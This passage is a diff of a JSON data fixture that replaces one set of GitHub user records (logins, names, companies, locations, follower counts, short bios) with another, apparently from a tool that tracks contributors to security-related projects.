"https://avatars.githubusercontent.com/u/378154?v=4", - "company": "Nokia", - "location": "Massy, France", + "nest_created_at": "2024-09-22T07:46:48.048Z", + "nest_updated_at": "2024-09-22T18:49:21.581Z", + "name": "Jack Aboutboul", + "login": "jaboutboul", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1034564?v=4", + "company": "ex-Red Hat, ex-Twilio", + "location": "NYC", "collaborators_count": 0, - "following_count": 2, - "followers_count": 9, - "public_gists_count": 0, - "public_repositories_count": 44, - "created_at": "2010-08-27T15:08:48Z", - "updated_at": "2024-09-06T16:10:53Z", - "node_id": "MDQ6VXNlcjM3ODE1NA==", + "following_count": 11, + "followers_count": 12, + "public_gists_count": 29, + "public_repositories_count": 42, + "created_at": "2011-09-08T01:47:43Z", + "updated_at": "2024-08-11T18:31:32Z", + "node_id": "MDQ6VXNlcjEwMzQ1NjQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392378,24 +649827,24 @@ }, { "model": "github.user", - "pk": 1286, + "pk": 6557, "fields": { - "nest_created_at": "2024-09-11T23:17:25.413Z", - "nest_updated_at": "2024-09-11T23:17:26.229Z", - "name": "", - "login": "sphengle", + "nest_created_at": "2024-09-22T07:46:49.019Z", + "nest_updated_at": "2024-09-22T18:49:22.520Z", + "name": "Aseem Jakhar", + "login": "aseemjakhar", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15677654?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/882058?v=4", + "company": "Payatu Technologies", + "location": "India", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 25, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2015-11-05T20:01:54Z", - "updated_at": "2022-12-01T09:09:21Z", - "node_id": "MDQ6VXNlcjE1Njc3NjU0", + "public_repositories_count": 2, + "created_at": "2011-06-28T18:15:46Z", + "updated_at": "2024-01-22T05:59:31Z", + "node_id": "MDQ6VXNlcjg4MjA1OA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392403,14 +649852,39 @@ }, { "model": "github.user", - "pk": 1287, + "pk": 6558, "fields": { - "nest_created_at": "2024-09-11T23:17:27.017Z", - "nest_updated_at": "2024-09-11T23:17:27.017Z", + "nest_created_at": "2024-09-22T07:46:49.956Z", + "nest_updated_at": "2024-09-22T18:49:23.512Z", + "name": "Vitor Guia", + "login": "vitoranguia", + "email": "contato@vitor.guia.nom.br", + "avatar_url": "https://avatars.githubusercontent.com/u/9786665?v=4", + "company": "@sepbit", + "location": "Carpina, Pernambuco, Brazil", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 15, + "public_gists_count": 1, + "public_repositories_count": 8, + "created_at": "2014-11-16T17:45:28Z", + "updated_at": "2024-03-14T11:00:24Z", + "node_id": "MDQ6VXNlcjk3ODY2NjU=", + "bio": "Especialista em segurança da informação, analista e desenvolvedor de sistemas", + "is_hireable": true, + "twitter_username": "vitoranguia" + } +}, +{ + "model": "github.user", + "pk": 6559, + "fields": { + "nest_created_at": "2024-09-22T07:46:50.908Z", + "nest_updated_at": "2024-09-22T19:42:03.293Z", "name": "", - "login": "Prochy", + "login": "sabinranjit", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6740126?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/77010176?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -392418,9 +649892,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2014-02-20T17:32:19Z", - "updated_at": "2024-06-13T07:59:53Z", - "node_id": "MDQ6VXNlcjY3NDAxMjY=", + "created_at": "2021-01-05T14:23:24Z", + "updated_at": "2024-03-15T16:45:04Z", + "node_id": "MDQ6VXNlcjc3MDEwMTc2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392428,49 +649902,49 @@ }, { "model": "github.user", - "pk": 1288, + "pk": 6560, "fields": { - "nest_created_at": "2024-09-11T23:17:27.853Z", - "nest_updated_at": "2024-09-16T22:28:59.521Z", - "name": "Savek-CC", - "login": "savek-cc", + "nest_created_at": "2024-09-22T07:46:51.222Z", + "nest_updated_at": "2024-09-22T18:49:24.857Z", + "name": "Ryan Mast", + "login": "nightlark", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13501427?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3969255?v=4", "company": "", - "location": "Germany", + "location": "California", "collaborators_count": 0, - "following_count": 8, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 29, - "created_at": "2015-07-25T21:53:53Z", - "updated_at": "2024-09-11T10:28:50Z", - "node_id": "MDQ6VXNlcjEzNTAxNDI3", - "bio": "IT security at day, hacking T1D at night", + "following_count": 51, + "followers_count": 9, + "public_gists_count": 3, + "public_repositories_count": 159, + "created_at": "2013-03-25T22:59:28Z", + "updated_at": "2024-09-05T11:27:42Z", + "node_id": "MDQ6VXNlcjM5NjkyNTU=", + "bio": "", "is_hireable": true, - "twitter_username": "" + "twitter_username": "rmast" } }, { "model": "github.user", - "pk": 1289, + "pk": 6561, "fields": { - "nest_created_at": "2024-09-11T23:17:28.681Z", - "nest_updated_at": "2024-09-11T23:17:28.681Z", - "name": "", - "login": "yaourabi", + "nest_created_at": "2024-09-22T07:46:51.861Z", + "nest_updated_at": "2024-09-22T18:49:25.495Z", + "name": "Andy B", + "login": "andy-white-hat", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/75521136?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/49150815?v=4", "company": "", - "location": "Maroc", + "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 4, + "following_count": 27, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2020-12-05T08:18:55Z", - "updated_at": "2024-05-16T12:38:50Z", - "node_id": "MDQ6VXNlcjc1NTIxMTM2", + "public_repositories_count": 14, + "created_at": "2019-04-01T10:15:38Z", + "updated_at": "2024-08-08T10:07:12Z", + "node_id": "MDQ6VXNlcjQ5MTUwODE1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392478,24 +649952,24 @@ }, { "model": "github.user", - "pk": 1290, + "pk": 6562, "fields": { - "nest_created_at": "2024-09-11T23:17:30.379Z", - "nest_updated_at": "2024-09-12T00:27:09.138Z", + "nest_created_at": "2024-09-22T07:46:52.167Z", + "nest_updated_at": "2024-09-22T18:49:25.812Z", "name": "", - "login": "jasonparallel", + "login": "boris-cybelllum", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/602240?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/79354377?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 2, - "public_repositories_count": 42, - "created_at": "2011-02-05T18:27:06Z", - "updated_at": "2023-12-19T17:06:50Z", - "node_id": "MDQ6VXNlcjYwMjI0MA==", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-02-20T07:42:31Z", + "updated_at": "2024-07-16T06:48:39Z", + "node_id": "MDQ6VXNlcjc5MzU0Mzc3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392503,24 +649977,24 @@ }, { "model": "github.user", - "pk": 1291, + "pk": 6563, "fields": { - "nest_created_at": "2024-09-11T23:17:31.997Z", - "nest_updated_at": "2024-09-12T00:08:58.120Z", + "nest_created_at": "2024-09-22T07:46:52.481Z", + "nest_updated_at": "2024-09-22T18:49:26.146Z", "name": "", - "login": "andreas-hilti", + "login": "h3x9", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/69210561?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/137424928?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2020-08-04T16:21:13Z", - "updated_at": "2024-07-08T13:30:02Z", - "node_id": "MDQ6VXNlcjY5MjEwNTYx", + "public_repositories_count": 1, + "created_at": "2023-06-22T15:25:18Z", + "updated_at": "2024-01-23T14:09:58Z", + "node_id": "U_kgDOCDDwIA", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392528,24 +650002,24 @@ }, { "model": "github.user", - "pk": 1292, + "pk": 6564, "fields": { - "nest_created_at": "2024-09-11T23:17:32.871Z", - "nest_updated_at": "2024-09-11T23:17:32.871Z", + "nest_created_at": "2024-09-22T07:46:52.791Z", + "nest_updated_at": "2024-09-22T18:49:26.454Z", "name": "", - "login": "bhafner13", + "login": "idonders-secpat", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/170467033?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/123497194?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-05-21T19:49:11Z", - "updated_at": "2024-05-21T19:49:39Z", - "node_id": "U_kgDOCike2Q", + "public_repositories_count": 1, + "created_at": "2023-01-24T18:05:33Z", + "updated_at": "2024-09-12T15:29:26Z", + "node_id": "U_kgDOB1xq6g", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392553,24 +650027,24 @@ }, { "model": "github.user", - "pk": 1293, + "pk": 6565, "fields": { - "nest_created_at": "2024-09-11T23:17:34.483Z", - "nest_updated_at": "2024-09-17T23:42:23.047Z", - "name": "V3ct0r", - "login": "V3ct0r-v", + "nest_created_at": "2024-09-22T07:46:53.413Z", + "nest_updated_at": "2024-09-22T18:49:27.073Z", + "name": "", + "login": "jzebor", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/50343981?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/21113355?v=4", "company": "", - "location": "Boston, MA", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 3, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2019-05-06T22:51:25Z", - "updated_at": "2024-06-24T14:46:53Z", - "node_id": "MDQ6VXNlcjUwMzQzOTgx", + "public_repositories_count": 2, + "created_at": "2016-08-18T23:21:15Z", + "updated_at": "2024-05-07T16:52:27Z", + "node_id": "MDQ6VXNlcjIxMTEzMzU1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392578,49 +650052,49 @@ }, { "model": "github.user", - "pk": 1294, + "pk": 6566, "fields": { - "nest_created_at": "2024-09-11T23:17:35.381Z", - "nest_updated_at": "2024-09-18T18:56:15.293Z", - "name": "František Erben", - "login": "ferben", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45659268?v=4", - "company": "Quadient", - "location": "Czech Republic", + "nest_created_at": "2024-09-22T07:46:53.720Z", + "nest_updated_at": "2024-09-22T18:49:27.379Z", + "name": "Masahiro331", + "login": "masahiro331", + "email": "mur4m4s4.331@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20438853?v=4", + "company": "", + "location": "Japan,Tokyo ", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 5, + "followers_count": 114, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2018-12-06T11:54:27Z", - "updated_at": "2024-08-05T10:45:45Z", - "node_id": "MDQ6VXNlcjQ1NjU5MjY4", - "bio": "Happy coder, mostly macOS platform, sometimes Linux, DevOps, Ansible etc.", - "is_hireable": false, - "twitter_username": "erbenfr" + "public_repositories_count": 129, + "created_at": "2016-07-13T11:56:45Z", + "updated_at": "2023-12-15T04:57:32Z", + "node_id": "MDQ6VXNlcjIwNDM4ODUz", + "bio": "Sorry, I'm not good at English. \r\nI may write some terrible expressions.\r\nI am always looking for work.\r\n\r\n", + "is_hireable": true, + "twitter_username": "kumagami331" } }, { "model": "github.user", - "pk": 1295, + "pk": 6567, "fields": { - "nest_created_at": "2024-09-11T23:17:36.206Z", - "nest_updated_at": "2024-09-11T23:17:36.206Z", + "nest_created_at": "2024-09-22T07:46:54.345Z", + "nest_updated_at": "2024-09-22T18:49:28.004Z", "name": "", - "login": "spnzig", + "login": "settletop-niles", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/30037676?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/124741485?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2017-07-10T06:21:52Z", - "updated_at": "2024-07-02T07:09:32Z", - "node_id": "MDQ6VXNlcjMwMDM3Njc2", + "public_repositories_count": 3, + "created_at": "2023-02-07T22:40:20Z", + "updated_at": "2024-08-31T14:22:52Z", + "node_id": "U_kgDOB29nbQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392628,24 +650102,24 @@ }, { "model": "github.user", - "pk": 1296, + "pk": 6568, "fields": { - "nest_created_at": "2024-09-11T23:17:37.012Z", - "nest_updated_at": "2024-09-12T01:35:40.096Z", - "name": "S Manjunath", - "login": "itmanju", + "nest_created_at": "2024-09-22T07:46:55.008Z", + "nest_updated_at": "2024-09-22T18:49:28.619Z", + "name": "Dennis", + "login": "vchaindz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/77400469?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60224695?v=4", + "company": "Codenotary, Inc.", "location": "", "collaborators_count": 0, - "following_count": 7, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-01-13T15:23:54Z", - "updated_at": "2024-07-03T08:33:47Z", - "node_id": "MDQ6VXNlcjc3NDAwNDY5", + "following_count": 0, + "followers_count": 3, + "public_gists_count": 2, + "public_repositories_count": 30, + "created_at": "2020-01-23T14:10:54Z", + "updated_at": "2024-09-09T16:22:42Z", + "node_id": "MDQ6VXNlcjYwMjI0Njk1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392653,24 +650127,24 @@ }, { "model": "github.user", - "pk": 1297, + "pk": 6569, "fields": { - "nest_created_at": "2024-09-11T23:17:37.835Z", - "nest_updated_at": "2024-09-11T23:17:37.835Z", - "name": "", - "login": "bharathkolanda", + "nest_created_at": "2024-09-22T07:46:55.319Z", + "nest_updated_at": "2024-09-22T18:53:30.430Z", + "name": "Basil Hess", + "login": "bhess", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/175378804?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/149199?v=4", + "company": "IBM Research", + "location": "Zurich, Switzerland", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 24, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-07-12T04:05:51Z", - "updated_at": "2024-09-11T05:09:06Z", - "node_id": "U_kgDOCnQRdA", + "public_repositories_count": 16, + "created_at": "2009-11-05T09:39:35Z", + "updated_at": "2024-09-17T17:34:12Z", + "node_id": "MDQ6VXNlcjE0OTE5OQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392678,24 +650152,24 @@ }, { "model": "github.user", - "pk": 1298, + "pk": 6570, "fields": { - "nest_created_at": "2024-09-11T23:17:38.658Z", - "nest_updated_at": "2024-09-18T19:03:49.811Z", - "name": "", - "login": "AJquetta", + "nest_created_at": "2024-09-22T07:46:55.636Z", + "nest_updated_at": "2024-09-22T18:49:29.259Z", + "name": "Bradley Chavis", + "login": "ns-bchavis", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/89043349?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/85182146?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2021-08-16T19:55:47Z", - "updated_at": "2024-09-13T08:47:27Z", - "node_id": "MDQ6VXNlcjg5MDQzMzQ5", + "public_repositories_count": 1, + "created_at": "2021-06-01T15:22:40Z", + "updated_at": "2024-09-19T15:24:21Z", + "node_id": "MDQ6VXNlcjg1MTgyMTQ2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392703,49 +650177,49 @@ }, { "model": "github.user", - "pk": 1299, + "pk": 6571, "fields": { - "nest_created_at": "2024-09-11T23:17:39.477Z", - "nest_updated_at": "2024-09-11T23:17:39.477Z", - "name": "Giles Middleton @CACI", - "login": "Gilesey", + "nest_created_at": "2024-09-22T07:46:55.986Z", + "nest_updated_at": "2024-09-22T18:49:29.614Z", + "name": "Christian Hopf", + "login": "ckotzbauer", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/66631077?v=4", - "company": "CACI Ltd", + "avatar_url": "https://avatars.githubusercontent.com/u/14875968?v=4", + "company": "@nerdware-dev", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 57, + "followers_count": 56, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-06-08T14:33:59Z", - "updated_at": "2023-03-16T14:48:10Z", - "node_id": "MDQ6VXNlcjY2NjMxMDc3", - "bio": "", + "public_repositories_count": 30, + "created_at": "2015-09-28T16:16:21Z", + "updated_at": "2024-08-17T13:18:54Z", + "node_id": "MDQ6VXNlcjE0ODc1OTY4", + "bio": "Developer working with TypeScript, Go and .NET. Interested in Node.js, Security, Kubernetes and Cloud-Native.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "ckotzbauer1" } }, { "model": "github.user", - "pk": 1300, + "pk": 6572, "fields": { - "nest_created_at": "2024-09-11T23:17:40.306Z", - "nest_updated_at": "2024-09-11T23:17:40.306Z", - "name": "", - "login": "mbower10", + "nest_created_at": "2024-09-22T07:46:56.298Z", + "nest_updated_at": "2024-09-22T18:49:29.920Z", + "name": "CircuitSwan", + "login": "CircuitSwan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38541599?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/38862666?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-04-19T20:26:45Z", - "updated_at": "2021-06-01T01:06:30Z", - "node_id": "MDQ6VXNlcjM4NTQxNTk5", + "public_repositories_count": 2, + "created_at": "2018-04-30T15:52:37Z", + "updated_at": "2023-08-02T21:39:58Z", + "node_id": "MDQ6VXNlcjM4ODYyNjY2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392753,24 +650227,24 @@ }, { "model": "github.user", - "pk": 1301, + "pk": 6573, "fields": { - "nest_created_at": "2024-09-11T23:17:42.648Z", - "nest_updated_at": "2024-09-16T22:00:26.667Z", + "nest_created_at": "2024-09-22T07:46:56.614Z", + "nest_updated_at": "2024-09-22T18:49:30.228Z", "name": "", - "login": "wkoot", + "login": "CortezFrazierJr", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3715211?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/90806692?v=4", "company": "", - "location": "Utrecht, NL", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 14, + "following_count": 2, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2013-02-27T10:29:20Z", - "updated_at": "2024-09-11T20:10:01Z", - "node_id": "MDQ6VXNlcjM3MTUyMTE=", + "public_repositories_count": 67, + "created_at": "2021-09-15T23:49:21Z", + "updated_at": "2024-09-13T18:50:49Z", + "node_id": "MDQ6VXNlcjkwODA2Njky", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392778,49 +650252,24 @@ }, { "model": "github.user", - "pk": 1302, - "fields": { - "nest_created_at": "2024-09-11T23:18:26.864Z", - "nest_updated_at": "2024-09-18T18:58:46.656Z", - "name": "Kyle Hammond", - "login": "macblazer", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6825873?v=4", - "company": "@Jamf", - "location": "Saint Paul, MN", - "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2014-03-01T17:06:43Z", - "updated_at": "2024-09-16T20:47:29Z", - "node_id": "MDQ6VXNlcjY4MjU4NzM=", - "bio": "Principal Software Engineer at Jamf.", - "is_hireable": false, - "twitter_username": "" - } -}, -{ - "model": "github.user", - "pk": 1303, + "pk": 6574, "fields": { - "nest_created_at": "2024-09-11T23:18:28.580Z", - "nest_updated_at": "2024-09-11T23:18:28.580Z", + "nest_created_at": "2024-09-22T07:46:57.240Z", + "nest_updated_at": "2024-09-22T18:49:30.851Z", "name": "", - "login": "antonioholling", + "login": "cybeatstech", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/160503263?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/35011586?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2024-02-19T13:49:49Z", - "updated_at": "2024-08-13T18:16:47Z", - "node_id": "U_kgDOCZEV3w", + "created_at": "2018-01-01T20:50:23Z", + "updated_at": "2018-01-01T20:50:23Z", + "node_id": "MDQ6VXNlcjM1MDExNTg2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392828,14 +650277,14 @@ }, { "model": "github.user", - "pk": 1304, + "pk": 6575, "fields": { - "nest_created_at": "2024-09-11T23:18:30.250Z", - "nest_updated_at": "2024-09-16T22:17:48.613Z", + "nest_created_at": "2024-09-22T07:46:58.168Z", + "nest_updated_at": "2024-09-22T18:49:31.799Z", "name": "", - "login": "BalkiX", + "login": "fhoerni", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15444542?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/128364734?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -392843,9 +650292,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 1, - "created_at": "2015-10-30T15:03:23Z", - "updated_at": "2024-09-11T11:41:40Z", - "node_id": "MDQ6VXNlcjE1NDQ0NTQy", + "created_at": "2023-03-20T09:07:25Z", + "updated_at": "2024-08-19T09:51:59Z", + "node_id": "U_kgDOB6awvg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392853,99 +650302,99 @@ }, { "model": "github.user", - "pk": 1305, + "pk": 6576, "fields": { - "nest_created_at": "2024-09-11T23:18:54.295Z", - "nest_updated_at": "2024-09-11T23:18:54.295Z", - "name": "William Goff", - "login": "wrgoff", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/70279777?v=4", - "company": "Lockheed Martin", - "location": "Downingtown, PA 19335", + "nest_created_at": "2024-09-22T07:46:58.838Z", + "nest_updated_at": "2024-09-22T18:49:32.412Z", + "name": "Jamie Scott", + "login": "IAmATeaPot418", + "email": "jamie@endor.ai", + "avatar_url": "https://avatars.githubusercontent.com/u/5336227?v=4", + "company": "@endorlabs ", + "location": "Mordor, Middle Earth", "collaborators_count": 0, "following_count": 1, - "followers_count": 0, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2020-08-26T15:24:25Z", - "updated_at": "2022-04-01T02:34:16Z", - "node_id": "MDQ6VXNlcjcwMjc5Nzc3", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "public_repositories_count": 82, + "created_at": "2013-08-29T06:22:47Z", + "updated_at": "2024-09-22T11:33:01Z", + "node_id": "MDQ6VXNlcjUzMzYyMjc=", + "bio": "Generalist. Product management, security research, QA, design, sales and random yolos. I break things, lift weights and eat food. Fixes are less fun.", + "is_hireable": true, + "twitter_username": "IAmATeaPot418" } }, { "model": "github.user", - "pk": 1306, + "pk": 6577, "fields": { - "nest_created_at": "2024-09-11T23:18:57.643Z", - "nest_updated_at": "2024-09-11T23:24:04.711Z", - "name": "Sebastian Schuberth", - "login": "sschuberth", + "nest_created_at": "2024-09-22T07:46:59.500Z", + "nest_updated_at": "2024-09-22T18:49:33.045Z", + "name": "Kevin Deldycke", + "login": "kdeldycke", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/349154?v=4", - "company": "CEO & CTO of @doubleopen-project", - "location": "Berlin, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/159718?v=4", + "company": "", + "location": "☁︎", "collaborators_count": 0, - "following_count": 230, - "followers_count": 394, - "public_gists_count": 4, - "public_repositories_count": 115, - "created_at": "2010-07-30T10:42:04Z", - "updated_at": "2024-08-28T11:21:04Z", - "node_id": "MDQ6VXNlcjM0OTE1NA==", - "bio": "A Kotlin enthusiast who's enjoying to work with and on Open Source Software.", - "is_hireable": false, + "following_count": 0, + "followers_count": 1108, + "public_gists_count": 3, + "public_repositories_count": 53, + "created_at": "2009-11-30T05:11:50Z", + "updated_at": "2024-09-10T09:37:45Z", + "node_id": "MDQ6VXNlcjE1OTcxOA==", + "bio": "Entrepreneur, VP, Engineering Manager, Founding Engineer - Billing, Payments & IAM.\r\n", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1307, + "pk": 6578, "fields": { - "nest_created_at": "2024-09-11T23:18:58.449Z", - "nest_updated_at": "2024-09-11T23:18:58.449Z", - "name": "Greg Gibeling", - "login": "gdgib", + "nest_created_at": "2024-09-22T07:46:59.827Z", + "nest_updated_at": "2024-09-22T18:49:33.354Z", + "name": "Marton Illes", + "login": "martonilles", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/801167?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5451167?v=4", "company": "", - "location": "San Francisco Bay Area", + "location": "Hungary", "collaborators_count": 0, - "following_count": 2, - "followers_count": 11, - "public_gists_count": 0, - "public_repositories_count": 33, - "created_at": "2011-05-20T20:04:55Z", - "updated_at": "2024-08-09T14:23:22Z", - "node_id": "MDQ6VXNlcjgwMTE2Nw==", - "bio": "Hardware & software architect. When I say full stack I'm not kidding: everything from transistors to copyright law. My job is curing cancer, coding is a hobby.", + "following_count": 1, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 21, + "created_at": "2013-09-13T10:01:00Z", + "updated_at": "2024-07-15T20:45:36Z", + "node_id": "MDQ6VXNlcjU0NTExNjc=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1308, + "pk": 6579, "fields": { - "nest_created_at": "2024-09-11T23:18:59.738Z", - "nest_updated_at": "2024-09-11T23:18:59.738Z", - "name": "", - "login": "bhuvi11", + "nest_created_at": "2024-09-22T07:47:01.101Z", + "nest_updated_at": "2024-09-22T19:41:59.461Z", + "name": "Paul McKeown", + "login": "pmckeown", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/14215473?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/574865?v=4", "company": "", - "location": "", + "location": "Wellington, NZ", "collaborators_count": 0, - "following_count": 6, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 51, - "created_at": "2015-09-10T09:47:28Z", - "updated_at": "2024-08-21T11:27:16Z", - "node_id": "MDQ6VXNlcjE0MjE1NDcz", + "following_count": 3, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 11, + "created_at": "2011-01-20T17:40:20Z", + "updated_at": "2024-09-21T08:43:44Z", + "node_id": "MDQ6VXNlcjU3NDg2NQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392953,49 +650402,49 @@ }, { "model": "github.user", - "pk": 1309, + "pk": 6580, "fields": { - "nest_created_at": "2024-09-11T23:19:03.129Z", - "nest_updated_at": "2024-09-11T23:42:18.592Z", - "name": "A.J. Brown", - "login": "ajbrown", - "email": "aj@ajbrown.org", - "avatar_url": "https://avatars.githubusercontent.com/u/38450?v=4", - "company": "@sonatype", - "location": "Dayton, Ohio", + "nest_created_at": "2024-09-22T07:47:04.966Z", + "nest_updated_at": "2024-09-22T18:49:38.543Z", + "name": "Mads Kristensen", + "login": "madskristensen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1258877?v=4", + "company": "Microsoft", + "location": "Redmond, WA", "collaborators_count": 0, - "following_count": 13, - "followers_count": 26, - "public_gists_count": 30, - "public_repositories_count": 31, - "created_at": "2008-12-05T02:57:17Z", - "updated_at": "2024-07-31T14:43:46Z", - "node_id": "MDQ6VXNlcjM4NDUw", - "bio": "Principal Engineer @sonatype, Developer's developer, Technical Product Manager, Cloud Architect, and Race car driving Moon Gazer", + "following_count": 0, + "followers_count": 3863, + "public_gists_count": 13, + "public_repositories_count": 306, + "created_at": "2011-12-12T23:15:36Z", + "updated_at": "2024-01-31T12:34:41Z", + "node_id": "MDQ6VXNlcjEyNTg4Nzc=", + "bio": "Web developer, Visual Studio extension author, home automation nerd, and PM at Microsoft's Developer Division", "is_hireable": false, - "twitter_username": "adrianjbrown" + "twitter_username": "mkristensen" } }, { "model": "github.user", - "pk": 1310, + "pk": 6581, "fields": { - "nest_created_at": "2024-09-11T23:19:06.484Z", - "nest_updated_at": "2024-09-11T23:19:06.484Z", - "name": "", - "login": "d-baer", + "nest_created_at": "2024-09-22T07:47:05.277Z", + "nest_updated_at": "2024-09-22T18:49:38.849Z", + "name": "Gerry Ferdinandus", + "login": "GerryFerdinandus", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22482986?v=4", - "company": "@mt-ag", - "location": "Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/6232089?v=4", + "company": "", + "location": "Amsterdam, the Netherlands", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, + "following_count": 0, + "followers_count": 19, "public_gists_count": 0, - "public_repositories_count": 32, - "created_at": "2016-09-27T20:15:54Z", - "updated_at": "2024-08-16T11:30:25Z", - "node_id": "MDQ6VXNlcjIyNDgyOTg2", + "public_repositories_count": 7, + "created_at": "2013-12-20T17:09:14Z", + "updated_at": "2024-03-26T17:56:13Z", + "node_id": "MDQ6VXNlcjYyMzIwODk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -393003,124 +650452,124 @@ }, { "model": 